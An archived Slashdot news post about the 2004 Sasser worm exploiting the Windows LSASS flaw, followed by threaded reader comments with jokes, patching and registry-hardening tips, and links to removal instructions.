New Windows Worm on the Loose





Posted by michael on Saturday May 01, @01:40PM
from the batten-down-your-ports dept.
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."




Slashdot Login
Nickname:

Password:

Public Terminal

[ Create a new account ]
Related Links
· Dev Tools DevChannel
· Online Security Books
· Compare the best prices on: Software/Utilities
· Dynamoo
· Internet Storm Center
· Sasser worm
· Microsoft Bulletin MS04-011
· Windows Update
· Computer Associates
· F-Secure
· Symantec
· McAfee
· More Security stories
· Also by michael

< Intel Chief: Don't Call Us Benedict Arnold CEOs | Going Back to the Moon and Mars >
New Windows Worm on the Loose | Log in/Create an Account | Top | 535 comments (Spill at 50!) | Index Only | Search Discussion
Threshold:
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
ah... (Score:5, Funny)
by Anonymous Coward on Saturday May 01, @01:41PM (#9028359)
the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
[ Reply to This ]

Re:ah... (Score:5, Funny)
by Interruach (680347) on Saturday May 01, @01:48PM (#9028414)
(Last Journal: Saturday January 17, @07:01PM)
ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

-- I see your nat box and raise you a proxy server.
[ Reply to This | Parent ]
o Re:ah... by Anonymous Coward (Score:1) Saturday May 01, @02:06PM
+ Re:ah... by Anonymous Coward (Score:1) Saturday May 01, @02:14PM
Re:ah... (Score:5, Funny)
by Lord Kano (13027) on Saturday May 01, @02:38PM (#9028817)
(http://wpngg.org/)
Pussies! I'm whistling into a telephone receiver.

LK
[ Reply to This | Parent ]
* Re:ah... by Anonymous Coward (Score:1) Saturday May 01, @02:42PM
* Re:ah... by isorox (Score:2) Saturday May 01, @03:55PM
o Re:ah... by ichandarin (Score:2) Saturday May 01, @04:10PM
o Re:ah... by malarkey (Score:3) Saturday May 01, @07:31PM
o 1 reply beneath your current threshold.
* 1 reply beneath your current threshold.
Re:ah... (Score:5, Interesting)
by JPriest (547211) on Saturday May 01, @02:44PM (#9028867)
(http://toolbar.google.com/)
1990, the year someone said it was a bad idea to have default services in listening state.
1999, the year MS forgot was was said back in 90.
2003, the year of Microsofts new security initiative.
2004, the year of the Windows worms.
XP SP2, the patch for mentioned "listening state" error.
[ Reply to This | Parent ]
+ Re:ah... by Master of Transhuman (Score:2) Saturday May 01, @04:09PM
+ Re:ah... by zcat_NZ (Score:3) Saturday May 01, @05:48PM
# Re:ah... by Molina the Bofh (Score:3) Saturday May 01, @08:28PM
# Re:ah... by eean (Score:2) Sunday May 02, @02:00AM
+ 1 reply beneath your current threshold.
o Re:ah... by kasperd (Score:3) Saturday May 01, @03:02PM
+ Re:ah... by Vancorps (Score:3) Saturday May 01, @03:25PM
# Re:ah... by kasperd (Score:1) Saturday May 01, @03:33PM
* Re:ah... by Vancorps (Score:2) Saturday May 01, @03:39PM
o Re:ah... by kasperd (Score:1) Saturday May 01, @03:43PM
o Re:ah... by Vancorps (Score:2) Saturday May 01, @04:40PM
o Re:ah... by kasperd (Score:1) Sunday May 02, @03:41AM
o Re:ah... by Vancorps (Score:2) Sunday May 02, @05:35AM
* Re:ah... by GbrDead (Score:1) Saturday May 01, @07:20PM
o Re:ah... by kasperd (Score:1) Sunday May 02, @03:44AM
# Re:ah... by AKnightCowboy (Score:2) Saturday May 01, @04:37PM
* Re:ah... by kasperd (Score:1) Sunday May 02, @03:51AM
Re:ah... (Score:5, Funny)
by Master of Transhuman (597628) on Saturday May 01, @04:13PM (#9029479)

I have DOS - which doesn't listen to anything unless you tell it to.

Beat that.

(Well, I'm fibbing, I actually run Windows 2000, Windows XP and Red Hat 7.3. But I remember when I used to tell clients at BOFA that modem security was not an issue with DOS since if you weren't running XTalk or something, DOS could care less if the modem was on. Of course, this meant porn took a lot longer to download...)

[ Reply to This | Parent ]
# 1 reply beneath your current threshold.
o Re:ah... by jazman_777 (Score:3) Saturday May 01, @03:13PM
o Re:ah... by JDWTopGuy (Score:3) Saturday May 01, @03:32PM
+ Re:ah... by Sj0 (Score:3) Saturday May 01, @03:55PM
Re:ah... (Score:4, Informative)
by hawkbug (94280) on Saturday May 01, @05:55PM (#9030109)
(http://www.fimble.com/)
And thank you for your lazy attitude - you're the reason spammers can control broadband connected zombie boxes to fill my inbox with massive amounts of shit.
[ Reply to This | Parent ]
# Re:ah... by dustmite (Score:2) Saturday May 01, @08:54PM
* Re:ah... by natd (Score:1) Sunday May 02, @03:19AM
# 1 reply beneath your current threshold.
+ Re:ah... by kd5ujz (Score:1) Saturday May 01, @05:56PM
+ 1 reply beneath your current threshold.
o Re:ah... by Zardus (Score:1) Saturday May 01, @10:38PM
o 1 reply beneath your current threshold.
Re:ah... (Score:5, Insightful)
by Anonymous Coward on Saturday May 01, @01:50PM (#9028437)
the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.
[ Reply to This | Parent ]
o Re:ah... by RollingThunder (Score:2) Saturday May 01, @03:40PM
Re:ah... (Score:5, Insightful)
by Sj0 (472011) on Saturday May 01, @04:01PM (#9029386)
(http://powerusr.sphosting.com/ | Last Journal: Tuesday October 21, @11:56PM)
I just got hit with wone of these lsass viruses a few weeks ago.

Completely patched.

My stupidity was DMZing my firewall. Stupid, STUPID.

Freinds don't let freinds open their firewalls. Not even to play video games, no matter how many processes they have deactivated.

I think the tragedy here is that most "regular power users" (ie. the folks who think that they're big shit because they can install antivirus software and change their windows desktop) probably don't realize that it's entirely possible to have a completely patched windows machine that can still get infected by a virus if you plug it right into the internet. I honestly think these things are reaching a critical mass. It'll be interesting to see exactly how that manifests.
[ Reply to This | Parent ]
* Re:ah... by Anonymous Coward (Score:1) Saturday May 01, @02:05PM
* Re:ah... by curious.corn (Score:1) Saturday May 01, @10:30PM
* Re:ah... by TattleTale1975 (Score:1) Sunday May 02, @05:21AM
* 2 replies beneath your current threshold.

I Use X Windows (Score:5, Funny)
by craXORjack (726120) on Saturday May 01, @01:42PM (#9028367)
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

What is this 'Windows Update' of which you speak?
[ Reply to This ]

* Re:I Use X Windows by Anonymous Coward (Score:1) Saturday May 01, @01:46PM
o Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @01:49PM
+ Re:I Use X Windows by Anonymous Coward (Score:2) Saturday May 01, @01:56PM
# Re:I Use X Windows by squall14716 (Score:2) Saturday May 01, @02:00PM
* 1 reply beneath your current threshold.
Re:I Use X Windows (Score:5, Funny)
by temojen (678985) on Saturday May 01, @01:47PM (#9028405)
(Last Journal: Friday March 12, @05:54AM)
I believe it's a cludgey microsoft variant of

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

except that it requires you to reboot several times and repeatedly interact with it.
[ Reply to This | Parent ]
o Re:I Use X Windows by chosen_my_foot (Score:1) Saturday May 01, @02:11PM
Re:I Use X Windows (Score:5, Informative)
by pantherace (165052) on Saturday May 01, @02:32PM (#9028777)
That's fine for ONE computer, possibly even easier. (That's debatable, very debatable.) However, it only updates the OS & 1 office suite. If you would be so kind as to tell me about something that allows you to install applications to multiple computers from one on windows that doesn't cost a relatively large amount, such as Norton Ghost (which still requires a fairly complicated install, but fortunately only on one machine)?

SUS again updates only the OS + Office suite, so that doesn't cut it.

I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.
[ Reply to This | Parent ]
# Re:I Use X Windows by bonch (Score:2) Saturday May 01, @05:42PM
* Re:I Use X Windows by pantherace (Score:3) Saturday May 01, @06:48PM
o Re:I Use X Windows by Kevitt (Score:1) Saturday May 01, @11:36PM
o Re:I Use X Windows by pantherace (Score:2) Sunday May 02, @02:24AM
o 3 replies beneath your current threshold.
# 1 reply beneath your current threshold.
+ Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @02:35PM
# Re:I Use X Windows by Master of Transhuman (Score:2) Saturday May 01, @04:21PM
* Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @04:30PM
* 1 reply beneath your current threshold.
+ Re:I Use X Windows by N1KO (Score:1) Saturday May 01, @02:59PM
+ 1 reply beneath your current threshold.
Re:I Use X Windows (Score:5, Insightful)
by SpectreGadget (465507) on Saturday May 01, @02:43PM (#9028858)
(http://www.harryfamily.com/)
oh yes:

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.
[ Reply to This | Parent ]
+ Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @02:52PM
# Re:I Use X Windows by Vancorps (Score:2) Saturday May 01, @03:37PM
# Re:I Use X Windows by SpectreGadget (Score:1) Saturday May 01, @06:43PM
* Re:I Use X Windows by BlowChunx (Score:2) Saturday May 01, @07:14PM
+ Re:I Use X Windows by Afrosheen (Score:2) Saturday May 01, @03:28PM
# Re:I Use X Windows by pediddle (Score:2) Saturday May 01, @10:08PM
+ Re:I Use X Windows by ImpTech (Score:2) Saturday May 01, @03:57PM
+ Re:I Use X Windows by dmaxwell (Score:2) Saturday May 01, @04:13PM
# Re:I Use X Windows by Master of Transhuman (Score:2) Saturday May 01, @04:24PM
Re:I Use X Windows (Score:5, Funny)
by Suidae (162977) on Saturday May 01, @04:28PM (#9029584)
Ha, you all suck, I just tell my network admin to update everything so I can get on with the drinking beer and watching porn.
[ Reply to This | Parent ]
+ Re:I Use X Windows by ratsnapple tea (Score:1) Saturday May 01, @05:46PM
# Re:I Use X Windows by SirTalon42 (Score:1) Saturday May 01, @06:21PM
* Re:I Use X Windows by GbrDead (Score:2) Saturday May 01, @07:30PM
# Re:I Use X Windows by SpectreGadget (Score:1) Saturday May 01, @06:45PM
+ Re:I Use X Windows by talaphid (Score:1) Saturday May 01, @08:36PM
+ Let's not forget the Slackers out there... by big_groo (Score:2) Saturday May 01, @08:59PM
+ 2 replies beneath your current threshold.
o Re:I Use X Windows by reallocate (Score:3) Saturday May 01, @02:56PM
+ Re:I Use X Windows by Reducer2001 (Score:1) Saturday May 01, @03:03PM
# Re:I Use X Windows by reallocate (Score:2) Saturday May 01, @03:11PM
* Re:I Use X Windows by Reducer2001 (Score:1) Saturday May 01, @08:17PM
o Re:I Use X Windows by reallocate (Score:2) Saturday May 01, @09:36PM
+ Re:I Use X Windows by tomstdenis (Score:1) Saturday May 01, @04:23PM
# Re:I Use X Windows by TechniMyoko (Score:1) Saturday May 01, @05:17PM
* That function is... by jez9999 (Score:2) Saturday May 01, @06:03PM
o You should consider doing it correctly... by Ayanami Rei (Score:2) Saturday May 01, @11:26PM
o Re:You should consider doing it correctly... by jez9999 (Score:2) Sunday May 02, @03:33AM
o 1 reply beneath your current threshold.
* Re:I Use X Windows by SirTalon42 (Score:1) Saturday May 01, @06:23PM
Re:I Use X Windows (Score:5, Interesting)
by reallocate (142797) on Saturday May 01, @06:34PM (#9030324)
Well, as they say, YMMV.

I don't use a Windows machine from the adminstrator account. When I need to run Update, I switch over and do it as the administrator. I read before I install, and I don't install nonapplicable updates. I don't trust anyone's automagic updaters.

When I've used Gentoo, it's been as a desktop machine. I've installed it 3, maybe 4, times, always building from the minimal install (the one that takes a day and a night, and most of the second day...). I don't much about and I don't install "foreign" software. Every time I've used Gentoo, it goes belly up after I've installed some update or another.

Gentoo may have an excellent packaging system, but I don't have time or energy or purpose to become an expert on one more proprietary packaging and updating scheme.

Linux touts "choice" all the time, and rightly so. But the fact is that having a plethora of distribution-specific packaging schemes is a major pain that limits choice.

So long as the Linux community fails to agree to, implement, and use a single packaging and updating scheme, Linux will be a nonstarter outside the geek and corporate worlds.
[ Reply to This | Parent ]
* Re:I Use X Windows by shadowbearer (Score:2) Sunday May 02, @12:41AM
+ Re:I Use X Windows by Master of Transhuman (Score:2) Saturday May 01, @04:27PM
+ Re:I Use X Windows by 00420 (Score:2) Saturday May 01, @04:36PM
+ Re:I Use X Windows by boredMDer (Score:2) Saturday May 01, @04:41PM
+ 1 reply beneath your current threshold.
o Re:I Use X Windows by Cavelier (Score:1) Saturday May 01, @03:41PM
o Re:I Use X Windows by bryhhh (Score:2) Saturday May 01, @05:01PM
o Re:I Use X Windows by temojen (Score:3) Saturday May 01, @02:09PM
+ Re:I Use X Windows by kinzillah (Score:1) Saturday May 01, @02:39PM
Re:I Use X Windows (Score:4, Informative)
by GweeDo (127172) on Saturday May 01, @02:43PM (#9028859)
(http://www.grebowiec.net/)
Someone here obviously isn't using the 2.6 kernel tree with the happy new scheduler and timer. I can be happily compiling openoffice and still watch dvd's, play music, browse the web...anything else?
[ Reply to This | Parent ]
# Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @03:06PM
* Re:I Use X Windows by Anonymous Coward (Score:2) Saturday May 01, @03:37PM
o Re:I Use X Windows by squall14716 (Score:1) Saturday May 01, @03:51PM
o Re:I Use X Windows by SirTalon42 (Score:1) Saturday May 01, @06:30PM
* Re:I Use X Windows by temojen (Score:2) Saturday May 01, @03:37PM
o Re:I Use X Windows by the unbeliever (Score:2) Saturday May 01, @03:47PM
+ Expensive compiler by tepples (Score:1) Saturday May 01, @04:42PM
+ Re:I Use X Windows by the unbeliever (Score:2) Saturday May 01, @05:43PM
# Re:I Use X Windows by trompete (Score:2) Saturday May 01, @06:06PM
+ 1 reply beneath your current threshold.
o Re:I Use X Windows by Sj0 (Score:2) Saturday May 01, @04:03PM
# Re:I Use X Windows by jaelle (Score:1) Sunday May 02, @01:21AM
+ 2 replies beneath your current threshold.
o Re:I Use X Windows by temojen (Score:2) Saturday May 01, @07:45PM
+ 1 reply beneath your current threshold.
o Re:I Use X Windows by TCaptain (Score:1) Saturday May 01, @09:36PM
o Re:I Use X Windows by flatface (Score:2) Saturday May 01, @11:20PM
o 6 replies beneath your current threshold.
* Re:I Use X Windows by Three Headed Man (Score:1) Saturday May 01, @01:56PM
Re:I Use X Windows (Score:5, Informative)
by bamf (212) on Saturday May 01, @02:06PM (#9028576)
You've probably already installed it, just look for KB835732 in your list of installed updates.
[ Reply to This | Parent ]
+ Re:I Use X Windows by vk2 (Score:1) Saturday May 01, @05:36PM
# 1 reply beneath your current threshold.
o Re:I Use X Windows by DeadAgent (Score:1) Sunday May 02, @01:57AM
Re:I Use X Windows (Score:5, Funny)
by gnu-generation-one (717590) on Saturday May 01, @02:22PM (#9028700)
(http://konspire.sourceforge.net/)
"What is this 'Windows Update' of which you speak?"

Full text, in case of slashdotting:

"Thank you for your interest in Windows Update

Windows Update is the online extension of Windows that helps you get the most out of your computer.

You must be running a Microsoft Windows operating system in order to use Windows Update."

[ Reply to This | Parent ]
Re:I Use X Windows (Score:5, Funny)
by Anonymous Coward on Saturday May 01, @02:53PM (#9028935)

You must be running a Microsoft Windows operating system in order to use Windows Update.

Those monopolistic bastards.
[ Reply to This | Parent ]
+ 2 replies beneath your current threshold.
Re:I Use X Windows (Score:5, Funny)
by brunson (91995) * on Saturday May 01, @03:05PM (#9029030)
(http://www.brunson.com/)
It's kinda like:

yum --ask-lots-of-useless-questions=yes --reboot-for-no-apparent-reason=alot --resolve-dependencies-without-my-help=no update
[ Reply to This | Parent ]
+ Re:I Use X Windows by bonch (Score:2) Saturday May 01, @05:45PM
+ Re:I Use X Windows by TheSpoom (Score:2) Saturday May 01, @05:49PM
+ Re:I Use X Windows by Shaklee39 (Score:1) Saturday May 01, @06:13PM
+ 1 reply beneath your current threshold.
o Re:I Use X Windows by Master of Transhuman (Score:2) Saturday May 01, @04:29PM
o Re:I Use X Windows by amorangi (Score:1) Saturday May 01, @05:29PM
* Re:I Use X Windows by Anonymous Coward (Score:2) Saturday May 01, @04:18PM
* Re:I Use X Windows by bkhl (Score:3) Saturday May 01, @04:25PM
o Re:I Use X Windows by jez9999 (Score:1) Saturday May 01, @06:10PM
* Re:I Use X Windows by Epistax (Score:2) Saturday May 01, @09:34PM
* Re:I Use X Windows by craXORjack (Score:1) Saturday May 01, @02:02PM
o Re:I Use X Windows by squall14716 (Score:2) Saturday May 01, @02:13PM
+ Re:I Use X Windows by Master of Transhuman (Score:2) Saturday May 01, @04:16PM
+ 2 replies beneath your current threshold.
* 2 replies beneath your current threshold.

Mutex Trapping (Score:5, Interesting)
by Mr. Darl McBride (704524) on Saturday May 01, @01:42PM (#9028369)
(http://sco.iwethey.org/)
About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
[ Reply to This ]

* Re:Mutex Trapping by Mr. Darl McBride (Score:3) Saturday May 01, @01:45PM
Re:Mutex Trapping (Score:5, Informative)
by Anonymous Coward on Saturday May 01, @01:49PM (#9028427)
You can set permissions in the registry per key.

Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run
[ Reply to This | Parent ]
+ Re:Mutex Trapping by Saint Aardvark (Score:2) Saturday May 01, @01:51PM
Re:Mutex Trapping (Score:5, Informative)
by stef0x77 (529972) on Saturday May 01, @01:57PM (#9028496)
(http://slashdot.org/)
Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...
[ Reply to This | Parent ]
* Re:Mutex Trapping by Saint Aardvark (Score:2) Saturday May 01, @02:02PM
Re:Mutex Trapping (Score:5, Informative)
by Foolhardy (664051) on Saturday May 01, @02:35PM (#9028800)
You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).
[ Reply to This | Parent ]
o Re:Mutex Trapping by Mr. Darl McBride (Score:1) Saturday May 01, @03:45PM
o 1 reply beneath your current threshold.
* Re:Mutex Trapping by asmellysock (Score:1) Saturday May 01, @02:58PM
Re:Mutex Trapping (Score:5, Informative)
by cscx (541332) on Saturday May 01, @02:01PM (#9028525)
(http://slashdot.org/)
Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.

Note this only works on NT-based systems (e.g., WinXP)
[ Reply to This | Parent ]
* 1 reply beneath your current threshold.
+ 1 reply beneath your current threshold.
Re:Mutex Trapping (Score:5, Informative)
by kyhwana (18093) on Saturday May 01, @02:00PM (#9028519)
(http://www.kyhwana.org/)
Err, Startup Monitor [mlin.net] does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..
[ Reply to This | Parent ]
+ Re:Mutex Trapping by chachob (Score:2) Saturday May 01, @02:28PM
+ Re:Mutex Trapping by omicronish (Score:2) Saturday May 01, @02:47PM
# 1 reply beneath your current threshold.
+ 1 reply beneath your current threshold.
Re:Mutex Trapping (Score:5, Informative)
by Verteiron (224042) * on Saturday May 01, @02:03PM (#9028546)
(http://slashdot.org/)
It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.
[ Reply to This | Parent ]
+ Re:Mutex Trapping by cowbud (Score:1) Saturday May 01, @02:27PM
+ 1 reply beneath your current threshold.
o Re:Mutex Trapping by mytec (Score:2) Saturday May 01, @05:03PM
+ Re:Mutex Trapping by rookkey (Score:2) Saturday May 01, @09:39PM
Re:Mutex Trapping (Score:5, Informative)
by The Raven (30575) * on Saturday May 01, @01:48PM (#9028412)
(http://www.google.com/)
Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.

However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.
[ Reply to This | Parent ]
* Re:Mutex Trapping by Joe U (Score:3) Saturday May 01, @01:48PM
o Re:Mutex Trapping by Mr. Darl McBride (Score:2) Saturday May 01, @01:51PM
+ Re:Mutex Trapping by Foolhardy (Score:1) Saturday May 01, @02:41PM
# Re:Mutex Trapping by soulhuntre (Score:1) Saturday May 01, @03:43PM
# The Problem is. by rodgster (Score:1) Sunday May 02, @03:57AM
+ 1 reply beneath your current threshold.
* Re:Mutex Trapping by SchnauzerGuy (Score:3) Saturday May 01, @01:53PM
o Re:Mutex Trapping by slashkitty (Score:2) Saturday May 01, @03:25PM
o Re:Mutex Trapping by Mr. Darl McBride (Score:1) Saturday May 01, @02:11PM
o 1 reply beneath your current threshold.
* Re:Mutex Trapping by eyeye (Score:2) Saturday May 01, @01:55PM
* What about the SYSTEM account? by Vandil X (Score:2) Saturday May 01, @02:59PM
o Re:What about the SYSTEM account? by Vancorps (Score:2) Saturday May 01, @03:35PM
+ Re:What about the SYSTEM account? by rodgster (Score:1) Sunday May 02, @04:04AM
# Re:What about the SYSTEM account? by Vancorps (Score:2) Sunday May 02, @05:33AM
o 3 replies beneath your current threshold.
* Re:Mutex Trapping by Homology (Score:1) Saturday May 01, @03:05PM
* Re:Mutex Trapping by Halfbaked Plan (Score:1) Saturday May 01, @04:03PM
* Re:Mutex Trapping by rabidcow (Score:1) Saturday May 01, @08:09PM
* Re:Mutex Trapping by Mr. Darl McBride (Score:3) Saturday May 01, @02:09PM
* 2 replies beneath your current threshold.

Huh? (Score:5, Funny)
by grub (11606) on Saturday May 01, @01:43PM (#9028371)
(Last Journal: Wednesday March 17, @11:45AM)

A new worm?

May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)

Oh, there it is.
[ Reply to This ]

* Re:Huh? by markan18 (Score:1) Saturday May 01, @03:43PM
o Here's couple of infected hosts by rodgster (Score:1) Sunday May 02, @04:12AM

Removal Instructions (Score:5, Informative)
by modifried (605582) on Saturday May 01, @01:44PM (#9028381)
(http://www.modifried.com/)
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

http://www.microsoft.com/security/incident/sasser. asp [microsoft.com]
[ Reply to This ]

* Re:Removal Instructions by hound3000 (Score:2) Saturday May 01, @02:05PM
o Re:Removal Instructions by sweet cunny muffin (Score:1) Saturday May 01, @02:19PM
Re:Removal Instructions (Score:5, Interesting)
by blincoln (592401) on Saturday May 01, @03:01PM (#9028994)
(Last Journal: Monday March 22, @12:14AM)
Looks like they just cut and pasted that page.

Do you create all your HTML documents from scratch?

This worm release is pretty cool, I think. This is the first time I've got to see the patch deployment process I built with a couple of other people from my group send out patches to the entire company and get pretty much everybody taken care of before the worm was released. We built it from SMS SUS and a bunch of in-house components. 11,000 workstations across the country patched in less than a week, and we could have done it even faster in an emergency.

Regular SUS took care of our servers a week ago.
[ Reply to This | Parent ]
+ Re:Removal Instructions by /dev/trash (Score:2) Saturday May 01, @06:58PM
Re:Removal Instructions [mirrors] (Score:5, Funny)
by AvantLegion (595806) on Saturday May 01, @03:22PM (#9029134)
(Last Journal: Sunday January 11, @04:55AM)
Here's a few mirrors for those removal instructions, in case the rash of post-bug traffic slows things down:

http://fedora.redhat.com [redhat.com]
http://www.gentoo.org [gentoo.org]
http://www.debian.org [debian.org]
http://www.linux-mandrake.com [linux-mandrake.com]
http://www.slackware.com [slackware.com]
[ Reply to This | Parent ]
o Re:Removal Instructions [mirrors] by PygmySurfer (Score:2) Sunday May 02, @02:22AM

ah Nice, more work =) (Score:5, Funny)
by Quazion (237706) on Saturday May 01, @01:45PM (#9028382)
(http://www.unixgames.org/ | Last Journal: Thursday January 24, @05:24PM)
Atleast for me as the local consumer support guy.

Thanks Microsoft.
[ Reply to This ]

* Re:ah Nice, more work =) by w9wi (Score:2) Saturday May 01, @02:17PM
o Re:ah Nice, more work =) by chrome (Score:2) Saturday May 01, @03:29PM
* Re:ah Nice, more work =) by Halfbaked Plan (Score:1) Saturday May 01, @04:11PM
* Re:ah Nice, more work =) by Nevo (Score:2) Saturday May 01, @04:38PM

HAHA (Score:5, Funny)
by D-Cypell (446534) on Saturday May 01, @01:45PM (#9028386)
A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

The add server must be based on Microsoft's new Irony.NET framework!
[ Reply to This ]

Re:HAHA (Score:5, Insightful)
by yulek (202118) on Saturday May 01, @02:25PM (#9028719)
(http://www.popmonkey.com/ | Last Journal: Wednesday March 03, @04:23AM)
A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.
[ Reply to This | Parent ]
Re:HAHA (Score:5, Insightful)
by Lothsahn (221388) on Saturday May 01, @03:06PM (#9029033)
Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.

When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of it's normal speed, that's enough to take down almost any operation.

[ Reply to This | Parent ]
+ killing IE by Beer_Smurf (Score:2) Saturday May 01, @03:51PM
+ Re:HAHA by zcat_NZ (Score:1) Saturday May 01, @04:43PM
+ Re:HAHA by dheltzel (Score:2) Saturday May 01, @07:31PM
Re:HAHA (Score:5, Funny)
by Anonymous Coward on Saturday May 01, @03:40PM (#9029261)
but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.
[ Reply to This | Parent ]
+ Re:HAHA by Tokerat (Score:2) Sunday May 02, @03:38AM
o Re:HAHA by yulek (Score:2) Sunday May 02, @03:08AM
o 2 replies beneath your current threshold.
* Re:HAHA by Chester K (Score:2) Saturday May 01, @03:50PM
* Re:HAHA by joemc79 (Score:1) Saturday May 01, @03:51PM
* 1 reply beneath your current threshold.

# Blaster-style? Uh-oh. by squall14716 (Score:3) Saturday May 01, @01:47PM

* Re:Blaster-style? Uh-oh. by FractusMan (Score:3) Saturday May 01, @02:01PM
* Re:Blaster-style? Uh-oh. by gnu-generation-one (Score:2) Saturday May 01, @02:27PM
* Re:Blaster-style? Uh-oh. by mt v2.7 (Score:1) Saturday May 01, @03:43PM
o Re:Blaster-style? Uh-oh. by squall14716 (Score:1) Saturday May 01, @03:55PM
* Re:Blaster-style? Uh-oh. by Jugalator (Score:2) Saturday May 01, @04:00PM
o Re:Blaster-style? Uh-oh. by squall14716 (Score:1) Saturday May 01, @04:32PM
o Re:Blaster-style? Uh-oh. by tepples (Score:1) Saturday May 01, @09:34PM
* Free windows firewall by RogerWiclo (Score:1) Saturday May 01, @04:13PM
o Firewalls by rodgster (Score:1) Sunday May 02, @04:21AM
* Re:Blaster-style? Uh-oh. by UpnAtom (Score:1) Saturday May 01, @04:51PM
* Re:Blaster-style? Uh-oh. by value_added (Score:2) Saturday May 01, @05:14PM
* Re:Blaster-style? Uh-oh. by squall14716 (Score:1) Saturday May 01, @02:02PM
* Re:Blaster-style? Uh-oh. by squall14716 (Score:1) Saturday May 01, @02:47PM
* 2 replies beneath your current threshold.

# stay tuned by Anonymous Coward (Score:1) Saturday May 01, @01:47PM

Visit Windows Update? (Score:5, Funny)
by Anonymous Coward on Saturday May 01, @01:49PM (#9028421)
No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
[ Reply to This ]

Could you try to find out? (Score:4, Funny)
by empaler (130732) on Saturday May 01, @02:18PM (#9028666)
After I changed email address, I couldn't figure out where I'd subscribed to that newsletter, either... I'd really like it back...
[ Reply to This | Parent ]
o Re:Could you try to find out? by BokLM (Score:1) Saturday May 01, @06:22PM
o He was joking by metalhed77 (Score:2) Saturday May 01, @06:59PM
+ So was I by empaler (Score:1) Saturday May 01, @07:44PM
# I would have assumed so by metalhed77 (Score:2) Saturday May 01, @07:53PM
* I was as surprised as anyone by empaler (Score:1) Saturday May 01, @09:41PM
o I like insightful by empaler (Score:1) Saturday May 01, @07:48PM
o Re:Could you try to find out? by OmegaBlac (Score:1) Sunday May 02, @12:28AM
* 1 reply beneath your current threshold.

Dang... (Score:5, Funny)
by kennylives (27274) on Saturday May 01, @01:49PM (#9028428)
(Last Journal: Wednesday August 27, @11:39PM)
I have a Mac, you insensitive clod...
[ Reply to This ]

Re:Dang... (Score:5, Funny)
